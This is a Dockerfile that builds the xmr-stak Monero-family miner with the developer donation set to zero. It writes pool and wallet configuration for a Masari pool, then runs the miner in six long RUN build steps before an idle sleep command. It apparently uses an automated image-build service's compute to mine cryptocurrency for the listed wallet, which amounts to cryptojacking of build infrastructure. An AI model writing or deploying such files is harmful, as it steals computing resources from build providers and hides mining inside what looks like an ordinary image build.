FROM ubuntu:latest

RUN 	apt-get update && \
        apt-get install -y --no-install-recommends \
          build-essential \
          libssl-dev \
          libhwloc-dev \
          cmake \
          libmicrohttpd-dev \
          ca-certificates \
          unzip \
		  wget && \
        wget https://github.com/fireice-uk/xmr-stak/archive/2.4.3.zip && \
		unzip 2.4.3.zip && \
		mv xmr-stak-2.4.3 xmr-stak && \
		ls && \
        mkdir xmr-stak/build && \
        printf "#pragma once\n" > xmr-stak/xmrstak/donate-level.hpp && \
        printf "constexpr double fDevDonationLevel = 0.0;" >> xmr-stak/xmrstak/donate-level.hpp && \
        cd xmr-stak/build && \
        cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF .. && \
        make install && \
        cp /xmr-stak/build/bin/xmr-stak /xmrstak

RUN echo "\"call_timeout\":10,\"retry_time\":30,\"giveup_limit\":0,\"verbose_level\":4,\"print_motd\":true,\"h_print_time\":60,\"aes_override\":null,\"use_slow_memory\":\"warn\",\"tls_secure_algo\":true,\"daemon_mode\":false,\"flush_stdout\":false,\"output_file\":\"\",\"httpd_port\":0,\"http_login\":\"\",\"http_pass\":\"\",\"prefer_ipv4\":true," > /config.txt
RUN echo "\"pool_list\":[{\"pool_address\":\"pool.masaricoin.com:3333\",\"wallet_address\":\"5mjiEyryD4HQYgRLBeFBudQXnMaNkphXpUkYpKu8jqDj1bEd3TG15YZctLBYf5p4db4PU7GWPzkL2NSqRTGHDfMmUE1krEj+3000\",\"rig_id\":\"\",\"pool_password\":\"qa\",\"use_nicehash\":false,\"use_tls\":false,\"tls_fingerprint\":\"\",\"pool_weight\":1},],\"currency\":\"cryptonight_v7\"," > /pools.txt
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
RUN /xmrstak & sleep 4800
		
CMD ["sleep", "3600000000"]